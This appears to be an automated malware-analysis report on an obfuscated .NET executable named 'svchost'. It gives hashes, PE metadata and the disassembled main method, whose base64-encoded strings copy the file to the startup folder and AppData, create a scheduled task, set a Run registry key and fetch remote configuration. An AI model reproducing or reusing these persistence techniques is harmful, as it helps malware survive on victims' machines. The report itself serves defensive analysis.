Suspicious
Suspect

1cf2f07ea05488bdd4f38cf19e108019

PE Executable | MD5: 1cf2f07ea05488bdd4f38cf19e108019 | Size: 1.19 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
1cf2f07ea05488bdd4f38cf19e108019
Sha1
ec25c5737ced1c19bbaae7110499caf1ac879347
Sha256
7324dc59e2c7c2362de668932d9d38df2263dec910523d0596d1411a4f131d6f
Sha384
8366e20ba7f8dfdb613ba1da68bfaaf9025343ea0a5d5a573d2a71af774006b8be12c41648d830e472c99a8d73814be8
Sha512
9237c065771305a3261316a1a8b08acace999fbd6001c55348c332329c9f098873827c65e29b8a37f36948df6eff8cbd40d271a0a51c9488d5481e642c21bbd1
SSDeep
12288:NRNXqn/F3Nq2jQqMgnCjKlO36nvkk3ANhTzzXOVQtlhMZKCUejXxt/xG3UIUV773:/6HRkNYAsstbxRBM
TLSH
4F455A2878BB90595477FF913DECB9EADDDE2A636509681B1085430B8E12F80EF4393D

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

microsoft

Full Name

microsoft

EntryPoint

System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::6Pg25KV9BipmzFULHf1L()

Scope Name

microsoft

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

svchost

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

390

Main Method

System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::6Pg25KV9BipmzFULHf1L()

Main IL Instruction Count

275

Main IL

ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void MTOYBUWfXcKsDaEnGUS.DPLMIBMPOWNUJHTpGhzn::vblbwxCqW3gIK1kMP4Hr() call System.Boolean MTOYBUWfXcKsDaEnGUS.TXZXODV::t3j5iXjBFpXqorw19C49() brtrue IL_001F: ldc.i4.3 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.3 <null> stloc.3 <null> ldc.i4.4 <null> stloc.s V_4 ldloc.3 <null> ldloc.s V_4 add.ovf <null> stloc.s V_5 ldloc.s V_5 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_6 ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.s V_6 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_6 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) leave IL_008F: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_008F: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding 
System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.1 <null> call System.Void System.IO.File::Copy(System.String,System.String) leave IL_00F2: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00F2: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr c2NodGFza3MuZXhl call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_11 ldloc.s V_11 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_11 ldc.i4.5 <null> newarr System.String stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr L2NyZWF0ZSAvZiAvc2MgbWludXRlIC9tbyAxIC90biAi call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.1 <null> ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_21 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr IiAvdHIgIg== 
call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_21 ldc.i4.4 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Ig== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_11 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_01B1: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B1: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_13 call My.MyComputer My.MyProject::Mte8Jqq9EXMOdF6fz90A() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy 
Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.s V_13 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::NThjDacYGRifhGsAEfOL ldloc.s V_13 call System.Void System.IO.File::Copy(System.String,System.String) leave IL_024F: ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_024F: ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu ldsfld System.Boolean MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::1SmPsx1FmPYpEjg2CJpu brfalse IL_039F: ldnull ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::lt63TwDS3NEsRwu6iMzw call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_15 ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr R0VU call System.Byte[] System.Convert::FromBase64String(System.String) callvirt 
System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_Method(System.String) ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr TW96aWxsYS81LjA= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) ldloc.s V_15 callvirt System.Net.WebResponse System.Net.HttpWebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_16 ldloc.s V_16 callvirt System.IO.Stream System.Net.HttpWebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 br IL_034C: ldloc.s V_18 ldloc.s V_18 call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue IL_0343: ldloc.s V_17 ldloc.s V_18 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Og== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0343: ldloc.s V_17 ldloc.s V_18 ldc.i4.1 <null> newarr System.Char stloc.s V_22 ldloc.s V_22 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.String[] System.String::Split(System.Char[],System.Int32) stloc.s V_19 ldloc.s V_19 ldlen <null> conv.ovf.i4 <null> ldc.i4.2 <null> bne.un IL_0343: ldloc.s V_17 ldloc.s V_19 ldc.i4.0 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::eypkH3o5jVxEZlpUSujC ldloc.s V_19 ldc.i4.1 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String MTOYBUWfXcKsDaEnGUS.NOQFVDTXmJTlsThvwIU::WamHSEjgUx14JoJ20jGe ldloc.s V_17 callvirt 
System.String System.IO.StreamReader::ReadLine() stloc.s V_18 ldloc.s V_18 brtrue IL_02D6: ldloc.s V_18 leave IL_0367: leave IL_037B ldloc.s V_17 brfalse IL_0366: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_037B: leave IL_039F ldloc.s V_16 brfalse IL_037A: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_039F: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_039F: ldnull ldnull <null> ldftn System.Void MTOYBUWfXcKsDaEnGUS.GHIBAPYJMggKYIdZQ::mOMwOyn5PkQO8LeQVj6H() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>

No malware configuration was found at this point.